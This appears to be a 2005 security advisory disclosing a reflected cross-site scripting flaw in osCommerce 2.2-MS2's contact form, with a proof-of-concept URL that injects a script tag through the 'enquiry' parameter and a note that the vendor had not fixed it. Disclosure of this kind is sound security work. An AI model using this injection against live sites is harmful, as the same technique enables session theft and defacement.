[NOBYTES.COM: #3] osCommerce 2.2-MS2 - XSS Vulnerability
Hello All,
I have discovered XSS vulnerability in: osCommerce 2.2-MS2
Authors Site: http://www.oscommerce.com/
+-[Example:]--------------------------------------------------+
XSS:
http://www.victimsite.com/contact_us.php?&name=1&email=1&enquiry=%3C/textare
a%3E%3Cscript%3Ealert('w00t');%3C/script%3E
Result:
A nice pop up box.
+-[Notes:]----------------------------------------------------+
Vulnerabilities found on: 09/02/2005
Author(s) Informed on: 09/02/2005
Author(s) Response: None - Just sat on bug list
Author(s) Fix: - None As Of Yet
Regards
John Cobb
JohnC@xxxxxxxxxxx
http://www.nobytes.com